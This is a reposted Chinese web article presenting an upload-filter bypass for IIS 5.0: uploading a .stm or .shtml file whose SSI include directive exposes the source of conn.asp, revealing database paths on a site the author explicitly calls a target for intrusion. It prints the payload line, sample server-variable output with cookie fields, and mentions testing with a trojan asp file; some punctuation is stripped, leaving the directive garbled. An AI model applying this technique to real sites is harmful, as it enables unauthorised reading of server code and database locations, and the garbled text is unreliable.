熱點推薦:
您现在的位置: 電腦知識網 >> 網絡技術 >> 正文

解決IIS5.0不能上傳asp等文件

2022-06-13   來源: 網絡技術 

  利用stm來上傳還能執行程序代碼

  說保存為stm或者shtml看看運行如下:

  HTTP_ACCEPT:image/gif image/xxbitmap image/jpeg image/pjpeg application/xshockwaveflash application/vndmspowerpoint application/vndmsexcel application/msword */* HTTP_ACCEPT_LANGUAGE:zhcn HTTP_CONNECTION:KeepAlive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/ (compatible; MSIE ; Windows NT ; Maxthon; NET CLR ) HTTP_COOKIE:nbblastactivity=; bblastvisit=; bblastactivity=; bbuserid=; bbpassword=fdedeaafbaafcf; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip deflate
當前文件名稱:F:Webstm

  Web服務器的名稱和版本:MicrosoftIIS/
  主機名:localhost
  端口:
  客戶或客戶代理IP地址:
  客戶或客戶代理主機名:
  PATH_INFO 的值但帶有擴展為某個目錄規范的虛擬路    徑:F:Webstm
  客戶端給出附加路徑信息:/stm
image/gif image/xxbitmap image/jpeg image/pjpeg application/xshockwaveflash application/vndmspowerpoint application/vndmsexcel application/msword */*

  Quoted from Unkown:

  當網站不允許上傳asp cer cdx htr等文件時 上傳一個stm文件 內容為:

  <!#include file=connasp

  直接請求這個stm文件 connasp就一覽無遺 數據庫路徑也就到手啦
  原來就是如上所說的

  <!#include file=connasp

  就是一條SSI指令其作用是將的內容拷貝到當前的頁面中當訪問者來浏覽時會看到其它HTML文檔一樣顯示其中的內容
我在本地試驗成功!在我的iis目錄下建了一個teststm文件內容為

  <!#include file=connasp

  又在同一目錄下放了一個我的一個木馬文件okasp在浏覽器中請求teststm沒有什麼反映一片空白但是一查看源代碼狂暈原來就是我的asp文件的內容!這樣我們就可以利用這個來獲取要入侵的web的conn文件來獲得數據庫路徑但是一個前提是服務器的對stm或者shtml的擴展沒有刪除!


From:http://tw.wingwit.com/Article/Network/201311/29898.html
  • 上一篇文章:

  • 下一篇文章:
  • 推薦文章
    Copyright © 2005-2022 電腦知識網 Computer Knowledge   All rights reserved.